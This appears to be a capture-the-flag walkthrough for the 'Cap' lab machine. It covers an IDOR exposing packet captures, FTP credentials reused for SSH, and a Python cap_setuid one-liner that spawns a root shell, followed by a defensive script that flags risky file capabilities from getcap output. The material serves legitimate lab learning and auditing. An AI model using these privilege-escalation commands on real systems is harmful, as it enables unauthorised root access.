Cap
IP: 10.10.10.245
Cap is an easy-difficulty Linux machine running an HTTP server that performs management functions, including network capture. Improper access controls lead to an insecure direct object reference (IDOR), which allows access to other users' captures. One capture contains plaintext credentials that can be used to gain a foothold. Linux features are then exploited to escalate to root privileges.
task1
How many TCP ports are open?
3
task2
After running "Security Snapshot", the browser will redirect to a path formatted as /[something]/[id], where [id] represents the scanned ID number. What is [something]?
task3 Can you view the scan results of other users?
By changing the numeric id after data in the URL, you can view the scan results of other users.
task4 What is the ID of the sensitive data contained in the PCAP file?
The id is the number that follows data in the path; the pcap file with id 0 contains FTP login account information.
task5 In which application layer protocol does sensitive data appear in the pcap file?
ftp
task6 We have obtained Nathan's FTP password. What other services can this password be used for?
ssh
task7 Submit the flag located in Nathan's home directory.
ssh nathan@10.10.10.245
You can see the flag after logging in.
task8 Submit the flag located in the root directory.
Check the setuid bit.
find / -perm -u=s -type f 2>/dev/null
Privilege escalation script
https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS
Upload to the target machine 10.10.10.245
python
Reference: https://gtfobins.github.io/gtfobins/python/
cp $(which python) .
sudo setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/python3.8
import os
os.setuid(0)
os.system("/bin/bash")
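Audit note (an added example, not part of the original write-up): the setuid search above does not list file capabilities such as the cap_setuid granted by setcap, so a host review needs a separate pass over `getcap -r` output. The function name, the list of capabilities treated as root-equivalent and the sample lines are assumptions made for this example.

```shell
#!/bin/sh
# Flag files whose capabilities are effectively root-equivalent.
# Reads `getcap -r` output on stdin and accepts both output styles:
#   older libcap:  /path = cap_setuid+ep
#   newer libcap:  /path cap_setuid=ep
# RISKY is this example's own choice of capabilities to report.
RISKY='cap_setuid|cap_setgid|cap_sys_admin|cap_sys_module|cap_sys_ptrace'
RISKY="$RISKY|cap_dac_override|cap_dac_read_search|cap_chown|cap_fowner"

flag_risky_caps() {
    awk -v risky="$RISKY" '
    {
        clause = $NF                                # e.g. cap_setuid+eip
        path = $0
        sub(/[ \t]+(=[ \t]+)?[^ \t]+$/, "", path)   # drop clause and old " = "
        if (!match(clause, /[=+][eip]+$/)) next     # not a capability clause
        flags = substr(clause, RSTART + 1)
        names = substr(clause, 1, RSTART - 1)
        if (flags !~ /[ep]/) next                   # inheritable-only: skip
        if (names == "") {                          # "=ep" means every capability
            printf "%s: ALL [%s]\n", path, flags
            next
        }
        n = split(names, cap, ",")
        for (i = 1; i <= n; i++)
            if (cap[i] ~ ("^(" risky ")$"))
                printf "%s: %s [%s]\n", path, cap[i], flags
    }'
}

# Constructed sample input (not captured from the target machine).
sample_getcap_output() {
cat <<'EOF'
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tools/my perl cap_setuid=ep
/usr/local/bin/helper =ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
EOF
}

# On a real host: getcap -r / 2>/dev/null | flag_risky_caps
sample_getcap_output | flag_risky_caps
```

Any interpreter or general-purpose binary reported here should have the capability removed with `setcap -r <file>` unless there is a documented need for it.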